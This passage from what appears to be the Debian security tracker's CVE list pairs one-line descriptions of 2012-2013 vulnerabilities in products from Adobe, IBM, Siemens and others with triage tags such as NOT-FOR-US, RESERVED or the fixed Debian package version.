(wp-php-widget.php in the WP PHP widget plugin 1.0.2 for WordPress ...) NOT-FOR-US: WordPress plugin CVE-2013-0720 (The COBIME application before 0.9.4 for Android uses weak permissions ...) NOT-FOR-US: COBIME CVE-2013-0719 (The ArtIME Japanese Input application 1.1.2 and earlier for Android ...) NOT-FOR-US: ArtIME Japanese Input application CVE-2013-0718 (The Simeji application 4.8.1 and earlier for Android uses weak ...) NOT-FOR-US: Simeji CVE-2013-0717 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...) NOT-FOR-US: NEC Aterm routers CVE-2013-0716 (The web server in Wind River VxWorks 5.5 through 6.9 allows remote ...) NOT-FOR-US: Wind River VxWorks CVE-2013-0715 (The WebCLI component in Wind River VxWorks 5.5 through 6.9 allows ...) NOT-FOR-US: Wind River VxWorks CVE-2013-0714 (IPSSH (aka the SSH server) in Wind River VxWorks 6.5 through 6.9 ...) NOT-FOR-US: Wind River VxWorks CVE-2013-0713 (IPSSH (aka the SSH server) in Wind River VxWorks 6.5 through 6.9 ...) NOT-FOR-US: Wind River VxWorks CVE-2013-0712 (IPSSH (aka the SSH server) in Wind River VxWorks 6.5 through 6.9 ...) NOT-FOR-US: Wind River VxWorks CVE-2013-0711 (IPSSH (aka the SSH server) in Wind River VxWorks 6.5 through 6.9 ...) NOT-FOR-US: Wind River VxWorks CVE-2013-0710 (Buffer overflow in Kingsoft Writer 2007 and 2010 before 2724 allows ...) NOT-FOR-US: Kingsoft Writer CVE-2013-0709 (Cross-site scripting (XSS) vulnerability in dopvSTAR* 0091 allows ...) NOT-FOR-US: Bayashi dopvSTAR CVE-2013-0708 (Cross-site scripting (XSS) vulnerability in dopvCOMET* 0009b allows ...) NOT-FOR-US: Bayashi dopvCOMET CVE-2013-0707 (Unspecified vulnerability in JustSystems Ichitaro 2006 and 2007, ...) NOT-FOR-US: JustSystems Ichitaro CVE-2013-0706 (NEC Universal RAID Utility 1.40 Rev 680 and earlier, 2.31 Rev 1492 and ...) NOT-FOR-US: NEC Universal RAID Utility CVE-2013-0705 (Directory traversal vulnerability in LSI 3ware Disk Manager (3DM) ...) NOT-FOR-US: LSI 3ware Disk Manager CVE-2013-0704 (Directory traversal vulnerability in the GREE application before 1.3.3 ...) NOT-FOR-US: GREE Android app CVE-2013-0703 (Cross-site scripting (XSS) vulnerability in imgboard.com imgboard ...) NOT-FOR-US: imgboard CVE-2013-0702 (Cross-site scripting (XSS) vulnerability in Cybozu Garoon 2.0.0 ...) NOT-FOR-US: Cybozu Garoon CVE-2013-0701 (SQL injection vulnerability in Cybozu Garoon 2.5.0 through 3.5.3 ...) NOT-FOR-US: Cybozu Garoon CVE-2012-6472 (Opera before 12.12 on UNIX uses weak permissions for the profile ...) NOT-FOR-US: Opera CVE-2012-6471 (Opera before 12.12 allows remote attackers to spoof the address field ...) NOT-FOR-US: Opera CVE-2012-6470 (Opera before 12.12 does not properly allocate memory for GIF images, ...) NOT-FOR-US: Opera CVE-2012-6469 (Opera before 12.11 allows remote attackers to determine the existence ...) NOT-FOR-US: Opera CVE-2012-6468 (Heap-based buffer overflow in Opera before 12.11 allows remote ...) NOT-FOR-US: Opera CVE-2012-6467 (Opera before 12.10 follows Internet shortcuts that are referenced by a ...) NOT-FOR-US: Opera CVE-2012-6466 (Opera before 12.10 does not properly handle incorrect size data in a ...) NOT-FOR-US: Opera CVE-2012-6465 (Opera before 12.10 allows remote attackers to execute arbitrary code ...) NOT-FOR-US: Opera CVE-2012-6464 (Cross-site scripting (XSS) vulnerability in Opera before 12.10 allows ...) NOT-FOR-US: Opera CVE-2012-6463 (Cross-site scripting (XSS) vulnerability in Opera before 12.10 allows ...) NOT-FOR-US: Opera CVE-2012-6462 (Opera before 12.10 does not properly implement the Cross-Origin ...) NOT-FOR-US: Opera CVE-2012-6461 (The X.509 certificate-validation functionality in the https ...) NOT-FOR-US: Opera CVE-2012-6460 (Opera before 11.67 and 12.x before 12.02 allows remote attackers to ...) NOT-FOR-US: Opera CVE-2012-6459 (ConnMan 1.3 on Tizen continues to list the bluetooth service after ...) - connman 1.0-1.1 (bug #697580) [wheezy] - connman 1.0-1.1+wheezy1 [squeeze] - connman (Minor issue) CVE-2012-6458 RESERVED CVE-2012-6457 RESERVED CVE-2012-6456 RESERVED CVE-2012-6455 RESERVED CVE-2012-6454 RESERVED CVE-2012-6452 RESERVED CVE-2012-6451 RESERVED CVE-2012-6450 RESERVED CVE-2012-6449 RESERVED CVE-2012-6448 RESERVED CVE-2012-6447 RESERVED CVE-2012-6446 RESERVED CVE-2012-6445 RESERVED CVE-2012-6444 RESERVED CVE-2012-6443 RESERVED CVE-2012-6453 (Cross-site scripting (XSS) vulnerability in the RSS Reader extension ...) {DSA-2596-1} - mediawiki-extensions 2.11 (bug #696179) CVE-2012-6442 (Rockwell Automation EtherNet/IP products; 1756-ENBT, 1756-EWEB, ...) NOT-FOR-US: Rockwell Automation EtherNet/IP CVE-2012-6441 (Rockwell Automation EtherNet/IP products; 1756-ENBT, 1756-EWEB, ...) NOT-FOR-US: Rockwell Automation EtherNet/IP CVE-2012-6440 (The web-server password-authentication functionality in Rockwell ...) NOT-FOR-US: Rockwell Automation EtherNet/IP CVE-2012-6439 (Rockwell Automation EtherNet/IP products; 1756-ENBT, 1756-EWEB, ...) NOT-FOR-US: Rockwell Automation EtherNet/IP CVE-2012-6438 (Buffer overflow in Rockwell Automation EtherNet/IP products; ...) NOT-FOR-US: Rockwell Automation EtherNet/IP CVE-2012-6437 (Rockwell Automation EtherNet/IP products; 1756-ENBT, 1756-EWEB, ...) NOT-FOR-US: Rockwell Automation EtherNet/IP CVE-2012-6436 (Buffer overflow in Rockwell Automation EtherNet/IP products; ...) NOT-FOR-US: Rockwell Automation EtherNet/IP CVE-2012-6435 (Rockwell Automation EtherNet/IP products; 1756-ENBT, 1756-EWEB, ...) NOT-FOR-US: Rockwell Automation EtherNet/IP CVE-2012-6434 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: e107 CVE-2012-6433 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: e107 CVE-2013-0700 (Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to ...) NOT-FOR-US: Siemens SIMATIC CVE-2013-0699 (The Galil RIO-47100 Pocket PLC allows remote attackers to cause a ...) NOT-FOR-US: Galil RIO-47100 CVE-2013-0698 RESERVED CVE-2013-0697 RESERVED CVE-2013-0696 RESERVED CVE-2013-0695 RESERVED CVE-2013-0694 RESERVED CVE-2013-0693 RESERVED CVE-2013-0692 RESERVED CVE-2013-0691 RESERVED CVE-2013-0690 RESERVED CVE-2013-0689 RESERVED CVE-2013-0688 (Cross-site scripting (XSS) vulnerability in Invensys Wonderware ...) NOT-FOR-US: Invensys Wonderware Information Server CVE-2013-0687 (The installer routine in Schneider Electric MiCOM S1 Studio uses ...) NOT-FOR-US: Schneider Electric CVE-2013-0686 (Invensys Wonderware Information Server (WIS) 4.0 SP1SP1, 4.5- Portal, ...) NOT-FOR-US: Invensys Wonderware Information Server CVE-2013-0685 (Invensys Wonderware Information Server (WIS) 4.0 SP1SP1, 4.5- Portal, ...) NOT-FOR-US: Invensys Wonderware Information Server CVE-2013-0684 (SQL injection vulnerability in Invensys Wonderware Information Server ...) NOT-FOR-US: Invensys Wonderware Information Server CVE-2013-0683 (The DataSim and DataPid demonstration clients in Cogent Real-Time ...) NOT-FOR-US: DataSim and DataPid demonstration clients CVE-2013-0682 (Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub ...) NOT-FOR-US: Cogent DataHub CVE-2013-0681 (Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub ...) NOT-FOR-US: Cogent DataHub CVE-2013-0680 (Stack-based buffer overflow in the web server in Cogent Real-Time ...) NOT-FOR-US: Cogent DataHub CVE-2013-0679 (Directory traversal vulnerability in the web server in Siemens WinCC ...) NOT-FOR-US: Siemens WinCC CVE-2013-0678 (Siemens WinCC before 7.2, as used in SIMATIC PCS7 before 8.0 SP1 and ...) NOT-FOR-US: Siemens WinCC CVE-2013-0677 (The web server in Siemens WinCC before 7.2, as used in SIMATIC PCS7 ...) NOT-FOR-US: Siemens WinCC CVE-2013-0676 (Siemens WinCC before 7.2, as used in SIMATIC PCS7 before 8.0 SP1 and ...) NOT-FOR-US: Siemens WinCC CVE-2013-0675 (Buffer overflow in CCEServer (aka the central communications ...) NOT-FOR-US: Siemens WinCC CVE-2013-0674 (Buffer overflow in the RegReader ActiveX control in Siemens WinCC ...) NOT-FOR-US: Siemens WinCC CVE-2013-0673 (Directory traversal vulnerability in the web interface in the Health ...) NOT-FOR-US: MatrikonOPC CVE-2013-0672 (Cross-site scripting (XSS) vulnerability in the HMI web application in ...) NOT-FOR-US: Siemens WinCC CVE-2013-0671 (Directory traversal vulnerability in Siemens WinCC (TIA Portal) 11 ...) NOT-FOR-US: Siemens WinCC CVE-2013-0670 (CRLF injection vulnerability in the HMI web application in Siemens ...) NOT-FOR-US: Siemens WinCC CVE-2013-0669 (The HMI web application in Siemens WinCC (TIA Portal) 11 allows remote ...) NOT-FOR-US: Siemens WinCC CVE-2013-0668 (Multiple cross-site scripting (XSS) vulnerabilities in the HMI web ...) NOT-FOR-US: Siemens WinCC CVE-2013-0667 (Cross-site scripting (XSS) vulnerability in the HMI web application in ...) NOT-FOR-US: Siemens WinCC CVE-2013-0666 (The configuration utility in MatrikonOPC Security Gateway 1.0 allows ...) NOT-FOR-US: MatrikonOPC CVE-2013-0665 (Schweitzer Engineering Laboratories (SEL) AcSELerator QuickSet before ...) NOT-FOR-US: Schweitzer Engineering Laboratories AcSELerator QuickSet CVE-2013-0664 (The FactoryCast service on the Schneider Electric Quantum 140NOE77111 ...) NOT-FOR-US: Schneider Electric Quantum modules CVE-2013-0663 (Cross-site request forgery (CSRF) vulnerability on the Schneider ...) NOT-FOR-US: Schneider Electric Quantum modules CVE-2013-0662 RESERVED CVE-2013-0661 RESERVED CVE-2013-0660 RESERVED CVE-2013-0659 (The debugging feature on the Siemens CP 1604 and CP 1616 interface ...) NOT-FOR-US: Siemens Interface Card CVE-2013-0658 (Heap-based buffer overflow in RFManagerService.exe in Schneider ...) NOT-FOR-US: Schneider Electric Accutech Manager CVE-2013-0657 (Stack-based buffer overflow in Schneider Electric Interactive ...) NOT-FOR-US: Schneider Electric IGSS CVE-2013-0656 (Buffer overflow in a third-party ActiveX component in Siemens SIMATIC ...) NOT-FOR-US: Siemens SIMATIC CVE-2013-0655 (The client in Schneider Electric Software Update (SESU) Utility 1.0.x ...) NOT-FOR-US: Schneider Electric SESU CVE-2013-0654 (CimWebServer in GE Intelligent Platforms Proficy HMI/SCADA - ...) NOT-FOR-US: GE Intelligent Platforms Proficy CVE-2013-0653 (Directory traversal vulnerability in substitute.bcl in the WebView ...) NOT-FOR-US: GE Intelligent Platforms Proficy CVE-2013-0652 (GE Intelligent Platforms Proficy Real-Time Information Portal does not ...) NOT-FOR-US: GE Intelligent Platforms Proficy CVE-2013-0651 (The Portal installation process in GE Intelligent Platforms Proficy ...) NOT-FOR-US: GE Intelligent Platforms Proficy CVE-2012-6432 (Symfony 2.0.x before 2.0.20, 2.1.x before 2.1.5, and 2.2-dev, when the ...) NOT-FOR-US: Symfony CVE-2012-6431 (Symfony 2.0.x before 2.0.20 does not process URL encoded data ...) NOT-FOR-US: Symfony CVE-2012-6430 RESERVED CVE-2012-6429 RESERVED CVE-2013-0650 (Use-after-free vulnerability in Adobe Flash Player before 10.3.183.68 ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0649 (Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0648 (Unspecified vulnerability in the ExternalInterface ActionScript ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0647 (Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0646 (Integer overflow in Adobe Flash Player before 10.3.183.68 and 11.x ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0645 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0644 (Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0643 (The Firefox sandbox in Adobe Flash Player before 10.3.183.67 and 11.x ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0642 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0641 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.4, 10.x ...) NOT-FOR-US: Adobe Reader CVE-2013-0640 (Adobe Reader and Acrobat 9.x before 9.5.4, 10.x before 10.1.6, and ...) NOT-FOR-US: Adobe Reader CVE-2013-0639 (Integer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0638 (Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0637 (Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0636 (Stack-based buffer overflow in Adobe Shockwave Player before ...) NOT-FOR-US: Adobe Shockwave Player CVE-2013-0635 (Adobe Shockwave Player before 12.0.0.112 allows attackers to execute ...) NOT-FOR-US: Adobe Shockwave Player CVE-2013-0634 (Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0633 (Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0632 (Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-0631 (Adobe ColdFusion 9.0, 9.0.1, and 9.0.2 allows attackers to obtain ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-0630 (Buffer overflow in Adobe Flash Player before 10.3.183.50 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2013-0629 (Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10, when a password is not ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-0628 RESERVED CVE-2013-0627 (Unspecified vulnerability in Adobe Reader and Acrobat 9.x before ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0626 (Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0625 (Adobe ColdFusion 9.0, 9.0.1, and 9.0.2, when a password is not ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-0624 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0623 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0622 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0621 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0620 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0619 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0618 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0617 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0616 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0615 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0614 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0613 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0612 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0611 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0610 (Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0609 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0608 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0607 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0606 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0605 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0604 (Heap-based buffer overflow in Adobe Reader and Acrobat 9.x before ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0603 (Heap-based buffer overflow in Adobe Reader and Acrobat 9.x before ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0602 (Use-after-free vulnerability in Adobe Reader and Acrobat 9.x before ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0601 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2012-6428 (Carlo Gavazzi EOS-Box with firmware before 1.0.0.1080_2.1.10 ...) NOT-FOR-US: Carlo Gavazzi EOS-Box CVE-2012-6427 (Multiple SQL injection vulnerabilities in Carlo Gavazzi EOS-Box with ...) NOT-FOR-US: Carlo Gavazzi EOS-Box CVE-2012-6426 (LemonLDAP::NG before 1.2.3 does not use the signature-verification ...) - lemonldap-ng 1.2.2-3 (bug #696329) [wheezy] - lemonldap-ng 1.1.2-5+deb7u1 [squeeze] - lemonldap-ng (SAML code not present) CVE-2013-0600 (Unspecified vulnerability on IBM WebSphere DataPower XC10 Appliance ...) NOT-FOR-US: IBM WebSphere DataPower XC10 Appliance devices CVE-2013-0599 RESERVED CVE-2013-0598 RESERVED CVE-2013-0597 RESERVED CVE-2013-0596 RESERVED CVE-2013-0595 RESERVED CVE-2013-0594 RESERVED CVE-2013-0593 (Unspecified vulnerability in the olch2x32 ActiveX control in IBM SPSS ...) NOT-FOR-US: IBM SPSS SamplePower CVE-2013-0592 RESERVED CVE-2013-0591 RESERVED CVE-2013-0590 RESERVED CVE-2013-0589 RESERVED CVE-2013-0588 RESERVED CVE-2013-0587 RESERVED CVE-2013-0586 RESERVED CVE-2013-0585 RESERVED CVE-2013-0584 (The Data Replication Dashboard component in IBM InfoSphere Replication ...) NOT-FOR-US: IBM InfoSphere Replication Server CVE-2013-0583 RESERVED CVE-2013-0582 (Cross-site scripting (XSS) vulnerability in IBM Tivoli Federated ...) NOT-FOR-US: IBM Tivoli Federated Identity Manager CVE-2013-0581 RESERVED CVE-2013-0580 RESERVED CVE-2013-0579 RESERVED CVE-2013-0578 (The Sterling Order Management APIs in IBM Sterling Multi-Channel ...) NOT-FOR-US: IBM CVE-2013-0577 RESERVED CVE-2013-0576 RESERVED CVE-2013-0575 RESERVED CVE-2013-0574 RESERVED CVE-2013-0573 RESERVED CVE-2013-0572 (Cross-site scripting (XSS) vulnerability in IBM Document Connect for ...) NOT-FOR-US: IBM Document Connect for Application Support Facility CVE-2013-0571 (Cross-site scripting (XSS) vulnerability in IBM Document Connect for ...) NOT-FOR-US: IBM Document Connect for Application Support Facility CVE-2013-0570 RESERVED CVE-2013-0569 (Cross-site scripting (XSS) vulnerability in the Communities component ...) NOT-FOR-US: IBM Connections CVE-2013-0568 RESERVED CVE-2013-0567 RESERVED CVE-2013-0566 RESERVED CVE-2013-0565 (Cross-site scripting (XSS) vulnerability in the RPC adapter for the ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0564 RESERVED CVE-2013-0563 RESERVED CVE-2013-0562 RESERVED CVE-2013-0561 RESERVED CVE-2013-0560 RESERVED CVE-2013-0559 RESERVED CVE-2013-0558 RESERVED CVE-2013-0557 RESERVED CVE-2013-0556 RESERVED CVE-2013-0555 RESERVED CVE-2013-0554 RESERVED CVE-2013-0553 (The client implementation in IBM Sametime 8.5.1 through 8.5.2.1, as ...) NOT-FOR-US: IBM Sametime CVE-2013-0552 RESERVED CVE-2013-0551 RESERVED CVE-2013-0550 RESERVED CVE-2013-0549 RESERVED CVE-2013-0548 RESERVED CVE-2013-0547 RESERVED CVE-2013-0546 RESERVED CVE-2013-0545 RESERVED CVE-2013-0544 (Directory traversal vulnerability in the Administrative Console in IBM ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0543 (IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0542 (Cross-site scripting (XSS) vulnerability in the Administrative console ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0541 (Buffer overflow in IBM WebSphere Application Server (WAS) 6.1 before ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0540 (IBM WebSphere Application Server (WAS) Liberty Profile 8.5 before ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0539 RESERVED CVE-2013-0538 (Cross-site scripting (XSS) vulnerability in IBM Lotus Notes 8.x before ...) NOT-FOR-US: IBM Lotus Notes CVE-2013-0537 RESERVED CVE-2013-0536 RESERVED CVE-2013-0535 (Multiple cross-site scripting (XSS) vulnerabilities in the Classic ...) NOT-FOR-US: IBM Sametime CVE-2013-0534 RESERVED CVE-2013-0533 (Cross-site scripting (XSS) vulnerability in the Sametime Links server ...) NOT-FOR-US: IBM Sametime CVE-2013-0532 (Cross-site request forgery (CSRF) vulnerability in IBM Security ...) NOT-FOR-US: IBM Security AppScan Enterprise CVE-2013-0531 RESERVED CVE-2013-0530 RESERVED CVE-2013-0529 RESERVED CVE-2013-0528 RESERVED CVE-2013-0527 RESERVED CVE-2013-0526 RESERVED CVE-2013-0525 (Multiple cross-site scripting (XSS) vulnerabilities in IBM iNotes ...) NOT-FOR-US: IBM Domino CVE-2013-0524 RESERVED CVE-2013-0523 RESERVED CVE-2013-0522 RESERVED CVE-2013-0521 RESERVED CVE-2013-0520 (IBM Sterling Secure Proxy 3.2.0 and 3.3.01 before 3.3.01.23 Interim ...) NOT-FOR-US: IBM CVE-2013-0519 (IBM Sterling Secure Proxy 3.2.0 and 3.3.01 before 3.3.01.23 Interim ...) NOT-FOR-US: IBM CVE-2013-0518 (IBM Sterling Secure Proxy 3.2.0 and 3.3.01 before 3.3.01.23 Interim ...) NOT-FOR-US: IBM CVE-2013-0517 RESERVED CVE-2013-0516 RESERVED CVE-2013-0515 RESERVED CVE-2013-0514 RESERVED CVE-2013-0513 (IBM Security AppScan Enterprise 5.6 and 8.x before 8.7 and IBM ...) NOT-FOR-US: IBM Security AppScan Enterprise, Rational Policy Tester CVE-2013-0512 (Stack-based buffer overflow in the Manual Explore browser plug-in for ...) NOT-FOR-US: IBM Security AppScan Enterprise, Rational Policy Tester CVE-2013-0511 (Multiple SQL injection vulnerabilities in IBM Security AppScan ...) NOT-FOR-US: IBM Security AppScan Enterprise CVE-2013-0510 (IBM Security AppScan Enterprise 5.6 and 8.x before 8.7 includes a ...) NOT-FOR-US: IBM Security AppScan Enterprise CVE-2013-0509 RESERVED CVE-2013-0508 RESERVED CVE-2013-0507 RESERVED CVE-2013-0506 (Cross-site scripting (XSS) vulnerability in IBM Sterling Order ...) NOT-FOR-US: IBM Sterling Order Management CVE-2013-0505 (IBM Sterling Order Management 8.0 before HF127, 8.5 before HF89, 9.0 ...) NOT-FOR-US: IBM Sterling Order Management CVE-2013-0504 (Buffer overflow in the broker service in Adobe Flash Player before ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0503 (Cross-site scripting (XSS) vulnerability in the Bookmarks component in ...) NOT-FOR-US: IBM Lotus Connections CVE-2013-0502 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Information ...) NOT-FOR-US: IBM InfoSphere Information Server CVE-2013-0501 (The EdrawSoft EDOFFICE.EDOfficeCtrl.1 ActiveX control, as used in ...) NOT-FOR-US: IBM Cognos Disclosure Management CVE-2013-0500 RESERVED CVE-2013-0499 RESERVED CVE-2013-0498 RESERVED CVE-2013-0497 RESERVED CVE-2013-0496 RESERVED CVE-2013-0495 RESERVED CVE-2013-0494 RESERVED CVE-2013-0493 RESERVED CVE-2013-0492 RESERVED CVE-2013-0491 RESERVED CVE-2013-0490 (Unspecified vulnerability in IBM InfoSphere Guardium S-TAP 8.1 for DB2 ...) NOT-FOR-US: IBM InfoSphere Guardium CVE-2013-0489 (Cross-site request forgery (CSRF) vulnerability in webadmin.nsf (aka ...) NOT-FOR-US: IBM Domino CVE-2013-0488 (Cross-site scripting (XSS) vulnerability in webadmin.nsf (aka the Web ...) NOT-FOR-US: IBM Domino CVE-2013-0487 (The Java Console in IBM Domino 8.5.x allows remote authenticated users ...) NOT-FOR-US: IBM Domino CVE-2013-0486 (Memory leak in the HTTP server in IBM Domino 8.5.x allows remote ...) NOT-FOR-US: IBM Domino CVE-2013-0485 RESERVED CVE-2013-0484 RESERVED CVE-2013-0483 (The login component in SOAP Gateway in IBM IMS Enterprise Suite 1.1, ...) NOT-FOR-US: IBM IMS Enterprise Suite CVE-2013-0482 RESERVED CVE-2013-0481 RESERVED CVE-2013-0480 RESERVED CVE-2013-0479 RESERVED CVE-2013-0478 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Master Data ...) NOT-FOR-US: IBM CVE-2013-0477 (Multiple cross-site scripting (XSS) vulnerabilities in IBM InfoSphere ...) NOT-FOR-US: IBM CVE-2013-0476 RESERVED CVE-2013-0475 RESERVED CVE-2013-0474 (The Manual Explore browser plug-in in IBM Security AppScan Enterprise ...) NOT-FOR-US: IBM Security AppScan Enterprise CVE-2013-0473 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Security ...) NOT-FOR-US: IBM Security AppScan Enterprise CVE-2013-0472 (The Web GUI in the client in IBM Tivoli Storage Manager (TSM) 6.3 ...) NOT-FOR-US: IBM CVE-2013-0471 (The traditional scheduler in the client in IBM Tivoli Storage Manager ...) NOT-FOR-US: IBM CVE-2013-0470 (HTTPD in IBM Netezza Performance Portal 1.0.2 allows remote ...) NOT-FOR-US: IBM CVE-2013-0469 RESERVED CVE-2013-0468 RESERVED CVE-2013-0467 (IBM Eclipse Help System (IEHS), as used in IBM Data Studio 3.1 and ...) NOT-FOR-US: IBM CVE-2013-0466 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Message ...) NOT-FOR-US: IBM CVE-2013-0465 (Unspecified vulnerability in the IBM WebSphere Cast Iron physical and ...) NOT-FOR-US: IBM CVE-2013-0464 RESERVED CVE-2013-0463 RESERVED CVE-2013-0462 (Unspecified vulnerability in IBM WebSphere Application Server (WAS) ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0461 (Cross-site scripting (XSS) vulnerability in the virtual member manager ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0460 (Cross-site request forgery (CSRF) vulnerability in the portlet ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0459 (Cross-site scripting (XSS) vulnerability in the Administrative console ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0458 (Cross-site scripting (XSS) vulnerability in the Administrative console ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0457 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset ...) NOT-FOR-US: IBM CVE-2013-0456 RESERVED CVE-2013-0455 RESERVED CVE-2013-0454 (The SMB2 implementation in Samba 3.6.x before 3.6.6, as used on the ...) - samba 2:3.6.6-1 [squeeze] - samba (only Samba 3.6.0 - 3.6.5 (inclusive) affected) NOTE: https://www.samba.org/samba/security/CVE-2013-0454 CVE-2013-0453 (Cross-site scripting (XSS) vulnerability in Web Reports in IBM Tivoli ...) NOT-FOR-US: IBM Tivoli Endpoint Manager CVE-2013-0452 (Cross-site request forgery (CSRF) vulnerability in the Software Use ...) NOT-FOR-US: IBM Tivoli Endpoint Manager CVE-2013-0451 RESERVED CVE-2012-6425 RESERVED CVE-2012-6424 RESERVED CVE-2012-6423 RESERVED CVE-2012-6422 (The kernel in Samsung Galaxy S2, Galaxy Note 2, MEIZU MX, and possibly ...) NOT-FOR-US: Android kernel CVE-2012-6421 RESERVED CVE-2012-6420 RESERVED CVE-2012-6419 RESERVED CVE-2012-6418 RESERVED CVE-2012-6417 RESERVED CVE-2012-6416 RESERVED CVE-2012-6415 RESERVED CVE-2012-6414 RESERVED CVE-2012-6413 RESERVED CVE-2012-6412 RESERVED CVE-2012-6411 RESERVED CVE-2012-6410 RESERVED CVE-2012-6409 RESERVED 